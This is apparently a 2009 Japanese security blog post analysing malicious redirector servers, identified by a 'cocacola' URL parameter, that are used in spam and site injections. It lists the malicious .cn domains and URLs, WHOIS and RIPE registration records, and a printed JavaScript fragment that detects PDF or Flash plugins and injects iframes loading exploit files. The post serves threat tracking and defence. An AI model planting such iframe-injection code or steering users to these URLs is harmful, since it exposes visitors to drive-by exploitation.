Malicious PDF Server injection
Published: 2009/03/23
今年の頭からスパム文面上の誘導URLや、インジェクションだけでなく、いろいろな攻撃のリダイレクタとして登場するサーバー群です。こいつが直接インジェクションされていることもあります。共通項は「cocacola**」。ドメインもたくさんありますが「**」の部分の数字もいろいろあります。
yourliteseek.cn/in.cgi?cocacola litetopfindworld.cn/in.cgi?cocacola30 litedownloadseek.cn/in.cgi?cocacola29 litetopfindworld.cn/in.cgi?cocacola44 betstarwager.cn/in.cgi?cocacola84 bestlotron.cn/in.cgi?cocacola54 litetopfindworld.cn/in.cgi?cocacola48 betstarwager.cn/in.cgi?cocacola86 filmlifemusicsite.cn/in.cgi?cocacola95
2009/1/6の「pharmacy系botnet」の記事にも登場します。また、パキスタンやハンガリーの大使館サイトがインジェクション被害を受けた際に利用されていたのも、当時これらのドメインがホストされていたIPと同一のIPだったようです。直接確認してませんが。今は別のIPが使われてます。
ドメイン登録は中国のレジストラで取得されていて、レジストラントは「Scott Bell」「Raymond Keaton」「Michelle Rea」さんの三人のどれかで取得されているのが特徴です。
Domain Name: filmlifemusicsite.cn ROID: 20081007s10001s46122147-cn Domain Status: clientTransferProhibited Registrant Organization: Scott Bell Registrant Name: Scott Bell Administrative Email: ScottKBell@missiongossip.com Sponsoring Registrar: Name Server:ns1.freednshostserver.com Name Server:ns2.freednshostserver.com Registration Date: 2008-10-07 04:35 Expiration Date: 2009-10-07 04:35
Domain Name: betstarwager.cn ROID: 20081108s10001s82359910-cn Domain Status: clientTransferProhibited Registrant Organization: Raymond Keaton Registrant Name: Raymond Keaton Administrative Email: Keaton@cybernauttech.com Sponsoring Registrar: Name Server:ns1.freednshostserver.com Name Server:ns2.freednshostserver.com Registration Date: 2008-11-08 16:09 Expiration Date: 2009-11-08 16:09
このドメインをホストしているIPアドレスもころころ変わりますが、今現在はラトビアです。
inetnum: 94.247.2.0 - 94.247.3.255 netname: ZLKON descr: ZlKon country: LV admin-c: ZK508-RIPE tech-c: DES31-RIPE status: ASSIGNED PA mnt-by: PCEXPRESS-MNT mnt-lower: ZLKON-MNT mnt-routes: ZLKON-MNT changed: igors@pcexpress.lv 20081125 source: RIPE role: ZlKon HostMaster address: Lilijas iela 4-74 address: Riga, LV-1055 address: Latvija phone: +371 26330593 e-mail: hostmaster@zlkon.lv admin-c: AD5952-RIPE tech-c: AD5952-RIPE nic-hdl: ZK508-RIPE mnt-by: ZLKON-MNT changed: hostmaster@zlkon.lv 20081125 source: RIPE abuse-mailbox: abuse@zlkon.lv
で、さらに、こいつは、リダイレクトの方法が一定じゃないのが特徴です。
こんなスクリプトを食らわされることもあれば、
if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1)) { document.write('<iframe src="*****/readme.pdf"></iframe>'); } if(name.indexOf("Flash") != -1) { document.write('<iframe src="*****/flash.swf"></iframe>'); }
リダイレクトしていってこんなのを食らわされる場合もあります。
?詳細解析は放置してます。
スクリプト自体もマイナーチェンジを繰り返しているようです。
この手法の変化がなにをキーに行われているのかはよくわかりません。
by jyake